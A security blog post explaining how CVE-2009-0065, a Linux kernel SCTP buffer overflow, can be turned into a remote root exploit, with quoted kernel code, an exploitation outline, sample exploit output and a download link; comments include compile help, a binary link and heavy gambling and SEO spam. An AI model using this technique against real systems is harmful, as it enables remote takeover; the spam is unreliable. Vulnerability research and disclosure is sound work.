When a "potential D.o.S." means a one-shot remote kernel exploit: the SCTP story
Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065
"Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. "http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065
Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1
"The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)"http://www.ubuntu.com/usn/usn-751-1
RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html
"a buffer overflow was found in the Linux kernel Partial Reliable Streamhttp://rhn.redhat.com/errata/RHSA-2009-0331.html
Control Transmission Protocol (PR-SCTP) implementation.
This could, potentially, lead to a denial of service if a Forward-TSN chunk is received
with a large stream ID. (CVE-2009-0065, Important) "
Potentially a DoS? Unknown Impact? Really? :D
I'm wondering why kernel developers (or vendors?) continue to claim that kernel memory corruption are just Denial of Service. Most of the times they _are_ exploitable.. yes, even when the vulnerability is remotely triggered, yes.. even when the corruption takes place in a freaking slub in the middle of a kernel _heap_ .. yes even when you have kernel data pages marked NX and the kernel .text read-only and yes, absolutely yes even when you start only with a 16bit displacement...
Last month one of my customer (that has a _custom_ deployed sctp application on his network ) asked me if the vulnerability may have some impact on his systems. The answer? "Yes it does", and since someone thinks that is not exploitable and someone else speculates over a possible locally privilege escalation only (with remote host sending TSN packet) i decided to write a completely remote exploit.
It is extremely reliable (nearly one-shot always), given that you know the target kernel. I tested it on Ubuntu 8.04 and Ubuntu 8.10
server boxes running with different kernels (ubuntu kernel for amd64) and on OpenSuse11.1 and a Fedora Core 10 (yes, extra-brownie points here, it works great on Selinux too). ...
I dont want to talk about the exploit, because the code should be self explanatory, but i'd like to briefly explore the vulnerability:
From an exploit writer point of view, the most critical points are: where the memory corruption occurs, when it occurs and what type of data structures are involved. The code that triggers the overflow is on sctp_ssn_skip() in the file: /net/sctp/structs.h:
void sctp_ssn_skip(struct sctp_stream *stream, __u16 id, __u16 ssn)
{
stream->ssn[id] = ssn+1;
}
{
stream->ssn[id] = ssn+1;
}
Parameter "id" is not checked and later used as an index referenced by stream->ssn pointer: a 16bit value.
We can only overwrite memory _close_ the the struct involved.
Let's take a look at the sctp_stream structure and its stream pointer..
sctp_ssnmap_new() and sctp_ssnmap_init() function are in /net/sctp/ssnmap.c
Structures involved in streams mapping are:
struct sctp_stream {
__u16 *ssn;
unsigned int len;
};
struct sctp_ssnmap {
struct sctp_stream in;
struct sctp_stream out;
int malloced;
};
The code that allocates them is the following:
#define MAX_KMALLOC_SIZE 131072 //0x20000
...
size = sctp_ssnmap_size(in, out);
if (size <= MAX_KMALLOC_SIZE) retval = kmalloc(size, gfp);
If the size is under the MAX_KMALLOC_SIZE threshold the function dynamically allocates the sctp_ssnmap struct using as a parameter the number of in and out streams.
That's good news! Manipulating sctp handshake options we can arbitrary (if the sctp application has no application-level checks on, f.e., the number of simultaneously opened SCTP streams) decide the slab that will be used to allocate the chunk.
Immediately after that, the function calls sctp_ssnmap_init() to initialize in/out stream pointers:
static struct sctp_ssnmap *sctp_ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
memset(map, 0x00, sctp_ssnmap_size(in, out));
/* Start 'in' stream just after the map header. */
map->in.ssn = (__u16 *)&map[1]; <--- stream in init
map->in.len = in;
/* Start 'out' stream just after 'in'. */
map->out.ssn = &map->in.ssn[in]; <--- stream out init
map->out.len = out;
return map;
}
Again, good news. The stream pointers are self-contained. They point inside the previously allocated buffer, and more precisely the input stream is located exactly after the header. No kfree() will ever be called on these pointers: in other words they are a safe place to overwrite, and there's no need to worry about post-exploitation recovery.
The last thing that may complicate a bit the exploit is a check that the kernel makes before invoking sctp_ssn_skip():
/net/sctp/ulpqueue.c: sctp_ulpk_skip() :
if (SSN_lt(ssn, sctp_ssn_peek(in, sid))) <--- check
return;
/* Mark that we are no longer expecting this SSN or lower. */
sctp_ssn_skip(in, sid, ssn);
with SSN_lt():
enum {
SSN_SIGN_BIT = (1<<15)>
Strictly speaking this code checks if the value we are overwriting (the old SSN content) is greater or equal to the new value: if so it doesn't process the FWD chunk. The comparison here is made using Serial Number Arithmetic (like the one used for protocol sequence number (eg. tcp seq number)) and can be fooled writing multiple chunks until it legally wraps around to a well known defined value.
Then, at this point, if we know the target running kernel, we can:
1) Control the slab/slub to be used
2) Overwrite a safe pointer close to the overflowing buffer
3) Easily control overwritten data..
.. in other words..
..
#./sctp_houdini -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0
GAME OVER
The exploit code can be downloaded here.
86 Comments:
great!
Excellent work! Please continue your work!
kick ass!
oh snapparoonie! great work!
Great Job!
sgrakkyu++
Man, $100k if sold on the black market =)
Great job!
It's always nice to have good and talented people show us how we forget the obvious, continually. This somehow brings memories of Ciscogate to mind, but just by similarity of the original DoS vulnerability story.
Thanks for your work and for keeping full disclosure alive and well (where responsible). Everyone should be patched by now, unless they don't believe DoS vulns to be "important enough".
please compile sctp_houdini.c
gcc sctp_houdini.c -o sctp_houdini>> error:(
This is great stuff. The Linux kernel dev's are making a joke of linux security. We need more POC's like this to make the case.
w00t it ..
Good work
This is not a "valid" exploitation of the bug.
system("iptables -t filter -A OUTPUT -p sctp --chunk-types any ABORT -j DROP");
Using system to invoke an external process that requires root permissions as a foundation for the example of the exploit invalidates the exploit. Remove the dependency on iptables (or any root permission application).
When the OS is Unix and the exploit coder is Sgrakkyu the exploitability rate deserves its own metrics.
As Microsoft does, Vulnerabilities could still be explotiable if the Attacker has tremendous skills.
Kudos
(Clarification on comment regarding the system call). This fails on a remote system running 2.6.25 unless iptables has been modified.
you rock !!
[quote]This is not a "valid" exploitation of the bug.[\quote]
It's a remote root exploit, not a privilege escalation!
Wonder Backtrack4 effected or not.
mmmmmmm mybe yes kz its built as ubuntu :-/
Shit!! you fucked H00lishit!!
JaJa
gcc sctp_houdini.c -o sctp
sctp_houdini.c:32:26: error: netinet/sctp.h: No such file or directory
sctp_houdini.c: In function 'make_sctp_connection':
sctp_houdini.c:710: error: storage size of 'msg' isn't known
sctp_houdini.c:712: error: invalid application of 'sizeof' to incomplete type 'struct sctp_initmsg'
sctp_houdini.c:730: error: 'SOL_SCTP' undeclared (first use in this function)
sctp_houdini.c:730: error: (Each undeclared identifier is reported only once
sctp_houdini.c:730: error: for each function it appears in.)
sctp_houdini.c:730: error: 'SCTP_INITMSG' undeclared (first use in this function)
apt-get install libsctp-dev
Slackware 12.2 // gcc 4.2.4 //
libsctp-dev fail
Excellent exploit.
It still requires the victim to have an application listening on a sctp socket, that is a little hard to find, so I suppose the sky is not falling for linux yet.
Debian 5 ...
apt-get install libsctp-dev ...
binutils (2.18.1~cvs20080103-7) ...
libgomp1 (4.3.2-1.1) ...
gcc-4.3 (4.3.2-1.1) ...
gcc (4:4.3.2-2) ...
linux-libc-dev (2.6.26-15) ...
libc6-dev (2.7-18) ...
libsctp1 (1.0.9.dfsg-1) ...
libsctp-dev (1.0.9.dfsg-1) ...
lksctp-tools (1.0.9.dfsg-1) ...
Compilation:OK Execution:OK
=D
I like the cut of your jib.
gcc -o tes sctp_houdini.c
sctp_houdini.c:32:26: error: netinet/sctp.h: No such file or directory
sctp_houdini.c: In function 'make_sctp_connection':
sctp_houdini.c:710: error: storage size of 'msg' isn't known
sctp_houdini.c:712: error: invalid application of 'sizeof' to incomplete type 'struct sctp_initmsg'
sctp_houdini.c:730: error: 'SOL_SCTP' undeclared (first use in this function)
sctp_houdini.c:730: error: (Each undeclared identifier is reported only once
sctp_houdini.c:730: error: for each function it appears in.)
sctp_houdini.c:730: error: 'SCTP_INITMSG' undeclared (first use in this function)
asdf.cpp:21:1: warning: "_GNU_SOURCE" redefined
/command-line/: warning: this is the location of the previous definition
asdf.cpp: In function ‘void* make_fwd_packet(uint16_t, uint16_t, uint32_t, uint32_t, uint16_t (*)[2], int, int*)’:
asdf.cpp:576: error: invalid conversion from ‘void*’ to ‘uint8_t*’
what about this? any hints?
ok, nevermind :P *stupid* :)
First of all, tnx for your comments/feedbacks
I want to make some remarks:
- the exploit works _ONLY_ if you have listening sctp socket bound to an external interface and SCTP-PR enable (if you have not any sctp application and you want to test the exploit use sctp_test program)
- dont't try to run it (for testing purpose) on localhost, almost all the times it will fail for two main reasons:
1) the ABORT chunk may reach sctp stack
2) the ssnmap structures allocated by the client process play havoc with the ones allocated by the server creating hole in the "neightboard overflow" exploit logic
- about other distributions and other architectures, all non-patched kernel are vulnerable... but _this_ exploit works only for x86-64 kernels (does not work on 32bit ones). Anyway it's not difficult to port it, just do it if you want.
- about compilation issues: stop reporting them please :)
just install libsctp-dev package and don't use .cpp extension
Kernels in general always have flaws. Finding them
on any driver or module is always something that
kernel developers are trying to do. In fact their
are toolkits out there that look for these, not only
in SCTP, but also in TCP, UDP, IP et.al.
When I worked for a large router company we
turned these against some of the stacks we worked
on and they of course found bugs. Since these
tools cost $$'s its not surprising the kernel developers
for linux SCTP did not have access to them. I know
when we ran the tools against the FreeBSD SCTP
stack a huge number of vulnerabilities were fixed.
Basically bottom line is ... I bet you could find bugs
in several places in linux (or other O/S's) by using
such tools.
you can get the remote compiled from here
http://sec-r1z.com/attachment.php?attachmentid=125&d=1240955667
you need to regesiter sorry am just a user there ..
Good work buddy keep going ..
/j0rd4n14n.r1z
Complimenti sgrakkyu,per me erano anni che non si vedevano 'trick' del genere,
ottimo veramente.
Bello davvero Sgrà!
Sgrakkyone bello, un gran lavoro! You rock, man ;-) (gg sullivan)
"I'm wondering why kernel developers (or vendors?)..."
I assume Linus' stance on "security fixes" is why we don't see any coming from kernel.org:
http://article.gmane.org/gmane.linux.kernel/706600
look at all the script kiddies come out of the woodwork and not know how to fix/compile the code...as to the guy who said the exploit was "invalidated" come on man...its a remote root exploit...run it as root on your own box (or one of your hacked boxen)
also MAJOR KUDOS sgrakkyu
go die script kiddies
good one :)
well done! thx for showing this
please continue your work
This is Art of hacking , cool ......
Few linux with sctp services, but very good job :)
very nice post
What is the SCCP port to scan ips?And how can i discover the -t(verion) of the server(ip)?
lol@ kiddies
a very nice piece of work man. just wish i had more use for it, as sctp based applications are of limited extent.
@ Gadi Evron - shut the fuck up, you know nothing about talent.
@sgrakkyu - I like how you discovered this!
Anyone get one ip vuln? :(
Well It Was Very Nice Article It Is Very Useful For Linux Learners. We Are Also Providing Linux Online Courses Training. Our Linux Online Training Is One Of The Best Online Training Institute In The World.
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
Nino Nurmadi, S.Kom
aşk kitapları
youtube abone satın al
cami avizesi
cami avizeleri
avize cami
no deposit bonus forex 2021
takipçi satın al
takipçi satın al
takipçi satın al
takipcialdim.com/tiktok-takipci-satin-al/
instagram beğeni satın al
instagram beğeni satın al
btcturk
tiktok izlenme satın al
sms onay
youtube izlenme satın al
no deposit bonus forex 2021
tiktok jeton hilesi
tiktok beğeni satın al
binance
takipçi satın al
uc satın al
sms onay
sms onay
tiktok takipçi satın al
tiktok beğeni satın al
twitter takipçi satın al
trend topic satın al
youtube abone satın al
instagram beğeni satın al
tiktok beğeni satın al
twitter takipçi satın al
trend topic satın al
youtube abone satın al
takipcialdim.com/instagram-begeni-satin-al/
perde modelleri
instagram takipçi satın al
instagram takipçi satın al
takipçi satın al
instagram takipçi satın al
betboo
marsbahis
sultanbet
So nice to find somebody with unique
thoughts on this subject. Really.. many thanks
for starting this up.
경마사이트
경마
You are so awesome! I don’t think I’ve read through anything
like that before. 카지노
F*ckin’ tremendous thhings here. I’m very satisfied to peer your
article. Thanks so much and i’m taking a look ahead to contact you.
Will you please drop mme a mail?Click Me Here오피월드
2CHHE
Papers get to operate through Bible helpers and also plagiarism checkers to be certain that the author did not find idle at any stage in the process. Language inconsistencies won't be a thing with your newspapers as the specialists of our school paper writing support are passionate about writing and are always excited to strike you with something fresh. By: 먹튀검증사이트
Awesome article! I want people to know just how good this information is in your article. It’s interesting, compelling content. Your views are much like my own concerning this subject 먹튀검증 It touched me a lot. I would love to hear your opinion on my site. Please come to the site I run once and leave a comment. Thank you.
Great items from you, man. I have be aware your stuff prior to and you are
just extremely excellent. I actually like what you have
acquired right here, really like what you are stating
and the way in which you say it. You are making it entertaining and you continue
to care for to keep it sensible. I can’t wait to read much
more from you. That is really a terrific website.Click Here 오피월드
2YOUNGYANG
his site seems to inspire me a lot. Thank you so much for organizing and providing this quality information in an easy to understand way. I think that a healthy era of big data can be maintained only when such high-quality information is continuously produced. And I, too, are working hard to organize and provide such high-quality information. It would be nice to come in once and get information.
Also visit my site:토토
I really like what you guys tend to be up too.
This type of clever work and coverage! Keep up the superb works
guys I’ve added you guys to blogrollAlso visit my site :: 일본경마
JIYANG
I need to to thank you for this excellent read!! I definitely enjoyed every
little bit of it. I have you saved as a favorite to look at new stuff you post... 바카라
I found it very explanatory and informative, thank you very much for sharing your knowledge and wisdom with us.
Pinbahis
Hiltonbet
Jojobet
İmajbet
Aresbet
Maltcasino
Marsbahis
Trendbet
Great article, exactly what I was looking for.국내경마
What a nice post! I'm so happy to read this. baccarat What you wrote was very helpful to me. Thank you. Actually, I run a site similar to you. If you have time, could you visit my site? Please leave your comments after reading what I wrote. If you do so, I will actively reflect your opinion. I think it will be a great help to run my site. Have a good day.
havanese puppies for sale
havanese puppies for sale arkansas
This is the perfect post.사설토토사이트 It helped me a lot. If you have time, I hope you come to my site and share your opinions. Have a nice day.
Hello, I read the post well. casino online It's a really interesting topic and it has helped me a lot. In fact, I also run a website with similar content to your posting. Please visit once
I have always disliked the idea because of the costs.
야한동영상
But he's trying none the less. I've been using Movable-type on a variety of websites for about a year and am nervous about switching to another platform. I have heard good things about . Is there a way I can import all my word press posts into it? Any help would be really appreciated!
오피헌터
Hello there and thank you for your information – I've definitely picked up anything new from right here. I did however expertise a few technical points using this website, since I experienced to reload the site a lot of times previous to I could get it to load properly. I had been wondering if your web host is OK?
횟수 무제한 출장
Not that I am complaining, but slow loading instances times will sometimes affect your placement in google and could damage your high-quality score if advertising and marketing with AdWords. Well I am adding this RSS to my e-mail and can look out for a lot more of your respective fascinating content.
스포츠마사지
Your ideas inspired me very much. roulette It's amazing. I want to learn your writing skills. In fact, I also have a website. If you are okay, please visit once and leave your opinion. Thank you.
In case you are looking for something interesting, Just follow the link :토토사이트 We have so many to offer!!
Your explanation is organized very easy to understand!!! I understood at once. Could you please post about 우리카지노?? Please!!
خرید نهال بادام
This comment has been removed by the author.
This comment has been removed by the author.
Everything is very open with a clear clarification of the issues. It was really informative. Your site is extremely helpful. Thanks for sharing!
사설토토
바카라사이트
Oyundedem
Thank you. Depending on various factors, the baldness problem occurs, which can cause an extremely bad aesthetic appearance, with the loss of vitality of the hair cells on the scalp and shedding. In such cases, hair transplantation procedures can be used in order to look more aesthetic, younger and more dynamic and more confident. Takes part in hair transplantation operations as an institution that provides services at the highest standards with the most up-to-date technological facilities and a staff of doctors, each of whom is an expert in their own field. Hair Transplant Turkey
instagram takipçi satın al
casino siteleri
TDO4
You explained everything superab. But if you are in trouble to write your assignment, then you can hire the best academic writers in Australia from BookMyEssay
tipobet
betmatik
poker siteleri
kralbet
betpark
slot siteleri
kibris bahis siteleri
bonus veren siteler
mobil ödeme bahis
0BRX5
slot siteleri
kralbet
betpark
tipobet
betmatik
kibris bahis siteleri
poker siteleri
bonus veren siteler
mobil ödeme bahis
8G5T
binance hesap açma
elf bar
sms onay
3THZZH
Basically, you decide on your sex doll's hair, pubic hair, breast size, ダッチワイフbody shape, nipple size, vagina type, shoe soles, eye color, nails, heating, and more
Writing assignment is a really tough job and you need help with your assignment sometime, then contact Global assignment expert. They have all types of assignment services and they deliver assignment worldwide. Global assignment help writes assignment plagiarism free and delivers it to you on time. An assignment expert tries to write assignment in the best way, so you can easily understand that assignment with ease. Either you need Research Paper Help, computer science help, and many more, we have solution for all this. For more detail, do visit our website and connect with us.
Respect and I have a dandy offer you: How To Budget House Renovation split level home renovation
Post a Comment
Subscribe to Post Comments [Atom]
<< Home